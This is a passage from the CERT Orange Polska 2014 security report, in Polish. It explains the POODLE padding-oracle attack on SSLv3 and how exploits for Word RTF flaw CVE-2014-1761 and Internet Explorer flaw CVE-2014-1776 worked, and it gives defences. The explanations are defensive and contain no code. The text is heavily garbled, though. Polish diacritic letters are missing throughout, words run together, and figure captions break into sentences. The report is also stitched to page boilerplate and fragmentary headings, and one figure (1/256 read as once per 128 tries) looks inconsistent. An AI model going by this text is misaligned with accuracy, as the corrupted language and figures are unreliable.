zapisywana jako jego ostatni bajt.
Tre komunikacji warto MAC uzupenienie

Strona komunikacji SSL przyjmie szyfrogram, w ktrym zmodyfikowana jest ostatnia cz zawierajca
uzupenienie, pod warunkiem e po odszyfrowaniu
ostatni jego bajt bdzie mia poprawn warto.
Przyjto zaoenie, e atakujcy moe kontrolowa
cz zawartoci tekstu jawnego.
Wkryptologii atak taki nosi nazw ataku zwybranym tekstem jawnym.
Tux zaszyfrowany CBC
70
71
Wykres 25.
tekst jawny
tekst jawny
tekst jawny
Szyfrowanie CBC
wektor
inicjujcy
Szczegy ataku
Aby zrozumie dokadnie, wjaki sposb przeprowadzany
jest atak, naley przeledzi dokadnie, jak wyglda proces
szyfrowania ideszyfrowania.
Przyjmijmy, e protok posuguje si blokami o dugoci
8 bajtw. By zaszyfrowa wybrane dane, strona nadajca
klucz
klucz
szyfrowanie
wyznacza warto funkcji MAC na danych poddawanych
klucz
szyfrowanie
szyfrowaniu, docza j na kocu idodaje uzupenienie
szyfrowanie
wten sposb powstaje tekst jawny. Nastpnie tekst jawny dzielony jest na bloki orwnej dugoci. Pierwszy blok
jest poddawany dziaaniu operacji XOR z tzw. wektorem
inicjujcym, a nastpnie szyfrowany ustalonym kluczem.
Wynik odugoci 8 bajtw to pierwszy blok szyfrogramu.
szyfrogram
szyfrogram
Drugi blok tekstu jawnego jest poddawany dziaaniu ope-
szyfrogram
Wykres 26.
szyfrogram
klucz
deszyfrowanie
szyfrogram
klucz
deszyfrowanie
szyfrogram
klucz
deszyfrowanie
wektor
inicjujcy
tekst jawny
72
tekst jawny
tekst jawny
Deszyfrowanie CBC
racji XOR z otrzymanym w poprzednim kroku pierwszym

blokiem szyfrogramu, a nastpnie szyfrowany ustalonym
kluczem, itak a do ostatniego bloku.

>> Wykres 25.
Aby odszyfrowa dane, strona odbierajca uywa funkcji
deszyfrujcej zustalonym kluczem na pierwszym 8-bajtowym bloku, anastpnie poddaje XOR otrzyman warto
z wektorem inicjalizujcym. Pniej odszyfrowuje kolejny
8-bajtowy blok tekstu jawnego ipoddaje XOR zpoprzednim blokiem szyfrogramu. Czynnoci te s powtarzane na
kolejnych blokach szyfrogramu a do ostatniego. Uzupenienie jest odrzucane, awarto MAC jest porwnywana
z pozosta czci tekstu jawnego. Ten krok okaza si
kluczowy dla przeprowadzania ataku.

>> Wykres 26.
Uzupenienie jest bowiem odrzucane niezalenie od jego
zawartoci. Jeli mamy wpyw na zawarto tekstu jawnego, moemy doprowadzi do sytuacji, w ktrej cay ostatni
blok bdzie uzupenieniem, czyli wnaszym przykadzie
bdzie wypeniony siedmioma bajtami oraz smym bajtem
o wartoci 7. Tak wic czynnikiem, ktry zdecyduje, czy
strona odbierajca (w atakach tego typu nazywana rwnie wyroczni) na pytanie, czy tekst jawny jest poprawny,
udzieli odpowiedzi twierdzcej, bdzie to, czy ostatni bajt
ostatniego bloku tekstu jawnego ma warto 7. Jeli warto ta jest inna, pooenie wartoci MAC zostanie odczytane bdnie, aco za tym idzie, tekst zostanie odrzucony
z powodu niezgodnoci MAC. Po przechwyceniu transmisji zamiast ostatniego bloku autorzy ataku wstawiaj
inny, wybrany przez siebie blok szyfrogramu. Wtej sytuacji
strona odbierajca odszyfruje podsunity blok szyfrogramu ipodda operacji XOR zpoprzednim blokiem. Wwyniku
tego powstanie warto, ktra zostanie zinterpretowana
jako uzupenienie. Jej ostatni bajt bdzie zawiera dugo
uzupenienia i jednoczenie zdecyduje o wartoci sumy
MAC.
Jeli w naszym przykadzie ostatni bajt bdzie mia warto 7, suma MAC bdzie poprawna itekst zostanie przyjty przez stron odbierajc. Wtym przypadku bdziemy
mogli stwierdzi, e ostatni bajt tekstu jawnego odpowiadajcego wybranemu blokowi szyfrogramu XORowany
z ostatnim bajtem poprzedniego bloku szyfru (znanym)
daje wynik 7. Wystarczy znowu XORowa j z 7, aby
pozna warto ostatniego bajtu tekstu jawnego wybranego bloku. Jeli strona odbierajca odrzuci tekst, atakujcy moe zmieni ostatni bajt poprzedniego bloku iwysa
szyfrogram jeszcze raz.
Prawdopodobiestwo, e atakowany bajt tekstu jawnego
ma warto 7, jest rwne 1/256, co oznacza, e rednio
raz na 128 prb bajt zostanie zaakceptowany.
Nastpnie, majc kontrol nad czci tekstu jawnego (np.
cieki dania), moemy manipulowa dugoci tego
fragmentu. Pozycja atakowanego fragmentu (np. ciasteczka) bdzie si zmieniaa tak, by jego kolejne bajty staway
si ostatnimi bajtami ktrego bloku tekstu jawnego. Ciasteczko odugoci 10 bajtw mona bdzie wtedy odzyska rednio po 1280 zapytaniach.
Przeprowadzenie opisywanego ataku mona uniemoliwi,
jeeli wyczy si wsparcie dla protokou SSLv3 (np. dla
przegldarki internet Explorer mona to zrobi wPanelu
Sterowania, wybierajc Opcje internetowe, anastpnie
wzakadce Zaawansowane odznaczy Uyj SSL 3.0).
Jeli z jakiego powodu nie da si tego zrobi, liczb moliwych do przeprowadzenia na podstawie Poodle atakw
uda si ograniczy, wyczywszy wprzegldarce obsug
JavaScript. Dla administratorw, ktrych serwery wspieraj SSLv3, najlepszym wyjciem jest wyczenie lub zablokowanie tego protokou.
73
Rysunek 56.
Zawarto zoliwego pliku RTF
11.7 Zacznik 7. Inne interesujce podatnoci

Luka CVE-2014-1761 to uszkodzenie pamici wprocesie
programu Word. Zostaa ona odkryta przez pracownikw
Google Security Team i ujawniona 24 marca 2014 roku.
Odnaleziono funkcjonujce wsieci exploity, ktre opieraj
si na tej ciekawej podatnoci.
Rysunek 57.
Fragment kodu ActionScript
przeprowadzajcy heap spraying
Luka wykorzystuje bd oprogramowania Microsoft Word

w interpretacji dokumentu RTF. Dokument RTF opisuje,
w jaki sposb czytnik dokumentw powinien wywietla
jego zawarto. Robi to midzy innymi za pomoc sw
kontrolnych (nazywanych rwnie tagami) takich jak:
\comment, \datafield, \date. Sowa kontrolne powinny
by stosowane zgodnie z opublikowanym przez Microsoft standardem. Jednak nie da si wymusi na autorach
dokumentw przestrzegania tego standardu ikady czytnik powinien weryfikowa zgodno ich treci ze standardem, zanim przystpi do jej przetwarzania.
Wprzypadku luki CVE-2014-1761 rdem bdu okazao
si sowo kontrolne \overridetable i sowa z nim zwizane. Standard okrela, e sowo to powinno mie parametr
owartoci 0, 1 lub 9, natomiast wzoliwym dokumencie
RTF umieszczony zosta parametr owartoci 25. Czytnik
Microsoft Word nie sprawdza poprawnoci tego parametru, tylko przystpuje do dalszego przetwarzania zawartoci, wwyniku czego powstaj kolejne bdy. Jednym znich
jest bdna interpretacja typu obiektu. Dziki temu atakujcy uzyskuje kontrol nad elementami obiektu, do ktrych
nie powinien mie dostpu. Dodatkowo, odpowiednio formuujc zawarto dokumentu, moe zmusi czytnik do
wywoania metody obiektu, ktry zosta zmodyfikowany,
itym samym przej kontrol nad sterowaniem wykonania
kodu wwtku.

>> Rysunek 56.

Zaznaczono wykorzystywane sowo kluczowe

oraz fragment shellcode.
Autor exploitu wykorzystuje fakt, e biblioteka mscomctl.
dll nie wspiera mechanizmu ASLR19 oraz e znana jest mu
dokadnie struktura pamici wobszarze, w ktrym jest ona
zaadowana. Dziki temu moe skonstruowa shellcode
ROP, omin reszt funkcjonujcych wsystemie zabezpiecze iostatecznie wykona swj kod.
19
74
20
Luka zacza by stosowana w atakach przeciwko uytkownikom systemu Windows. Jej pierwsze wykorzystanie
zostao zarejestrowane 2 kwietnia. Zaobserwowano m.in.
prby zainstalowania trojana Cueisfry oraz Havex wkampaniach APT (Advanced Persistent Threat), czyli ukierunkowanych dziaaniach wywiadowczych.
Luka CVE-2014-1776 to uszkodzenie pamici wprzegldarce Internet Explorer ujawnione 26 kwietnia 2014 roku.
Badacze, ktrzy j odkryli i koordynowali jej atanie z firm Microsoft, twierdzili, e bya to cz trwajcej wanie
kampanii atakw nazwanej pniej Operation Clandestine
Fox.
Gdy uytkownik wchodzi na zoliw stron WWW, pobiera i otwiera specjalnie przygotowany plik Flash. Aktywna
zawarto znajdujca si w pliku przeprowadza proces
heap spraying, czyli przygotowuje pami procesu przegldarki do przeprowadzenia wamania, umieszczajc
wniej dane, ktre wtrakcie wamania zostan zinterpretowane jako kod. Nastpnie kod JavaScript umieszczony na
stronie deszyfruje swoj kolejn cz iwefekcie doprowadza do powstania bdu typu use-after-free. Exploit
przygotowuje shellcode ROP izmienia wskanik stosu tak,
by na niego wskazywa. Po cakowitym przejciu sterowania kodem wwtku przegldarki przystpuje do pobierania
skadnikw malware zsieci internet.

>> Rysunek 57.
Wedug informacji opublikowanych na stronie Microsoft
podatna jest przegldarka Internet Explorer w wersjach
6-11 (czyli praktycznie wszystkie obecnie uywane), jednak atakujcy wybierali na cele gwnie wersje 9-11.
Aby zabezpieczy si przed exploitami atakujcymi elementy systemu Windows, warto korzysta z zestawu
EMET20 zawierajcego narzdzia znacznie ograniczajcego moliwoci przejcia kontroli nad wykonaniem kodu.
Skuteczno zestawu zostaa potwierdzona m.in. wtrakcie testowania omawianego ataku. Nie zapominajmy oczywicie o regularnym aktualizowaniu przegldarki internetowej.
Address Space Layout Randomization funkcjonalno systemu operacyjnego przydzielajca kluczowym elementom aplikacji losowe miejsca w pamici
Tame
75
notatki
77
notatki
78
za rok 2014
Raport CERT Orange Polska
Wicej informacji znajdziesz na www.cert.orange.pl

Raport CERT Orange Polska

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Raport CERT Orange Polska

Uploaded by

Copyright:

Available Formats

Raport

CERT Orange Polska

Raport CERT Orange Polska za rok 2014

Raport powsta we wsppracy z Integrated Solutions,

1. Dlaczego powsta raport CERT Orange Polska?

2. Podsumowanie informacji zawartych wraporcie

3. CERT Orange Polska kim jestemy?

4. Najgroniejsze podatnoci 2014 roku na wiecie

Okiem partnera McAfee

5. Najwaniejsze zagroenia roku 2014 wsieci Orange Polska

Case study atak na modemy DSL (luty 2014)

Case study faszywe faktury, ataki phishingowe (2. poowa roku)

Ryzyka zwizane zatakami DDoS

Okiem partnera Radware

Malware na platformy stacjonarne

Malware na platformy mobilne

Okiem partnera FireEye

8. Skanowania portw ipodatnoci

9. Cyberwiat 2015 oczami partnerw Orange Polska

10. Komercyjne usugi bezpieczestwa Orange Polska

Zacznik 1. Analiza malware WinSpy (na komputery stacjonarne)

Zacznik 2. Analiza malware Emotet (na komputery stacjonarne)

Zacznik 3. Analiza malware NotCompatible.C (na urzdzenia mobilne zsystemem Android)

Zacznik 4. Analiza podatnoci Heartbleed

Zacznik 5. Analiza podatnoci Shellshock

Zacznik 6. Analiza podatnoci Poodle

Zacznik 7. Inne interesujce podatnoci

Raport CERT Orange Polska za rok 2014

1. Dlaczego powsta raport

Dla Orange Polska

Raport CERT Orange Polska za rok 2014

Systemy ochrony przed

W 2014 roku CERT Orange Polska obsugiwa ok. 1000

Najczciej atakowane przez cyberprzestpcw usugi to

Raport CERT Orange Polska za rok 2014

3. CERT Orange Polska kim jestemy?

Nasi klienci niejednokrotnie

Operatorzy CERT Orange Polska (I linia wsparcia) pracuj

W codziennej pracy CERT Orange Polska wsppracuje

Raport przygotowany przez CERT Orange Polska

Raport CERT Orange Polska za rok 2014

4. Najgroniejsze podatnoci 2014 roku

Oznacza to, e liczba podatnych systemw jest wysoka.

4.1 Okiem partnera McAfee

Raport CERT Orange Polska za rok 2014

5. Najwaniejsze zagroenia 2014 roku

Rozkad procentowy typw

W2014 roku zesp CERT Orange Polska obsuy 11 379

Typy incydentw obsuonych przez zesp CERT Oran-

ge Polska w2014 roku wrozkadzie procentowym przedMalware

stawiono na wykresie 1, poniej szczegowo opisano

poszczeglne kategorie. Kategorie oparte s na typie

nych zprocesem ataku na system teleinformatyczny ijego

przez CERT Orange Polska

wykorzystaniem. >> Wykres 1.

Mimo faktu, e zagroenia wynikajce ze spamu s znane

Raport CERT Orange Polska za rok 2014

5.1 Case study atak na modemy DSL (luty 2014)

przejmuj oni dziki malware kontrol nad komputerem

Wlutym 2014 roku nastpi zmasowany atak na modemy

Rysunek 1 poniej przedstawia proces ataku.

podstawione serwisy WWW,

Atakujcy pobieraj konfiguracj

Atakujcy ustawiaj adresy serwerw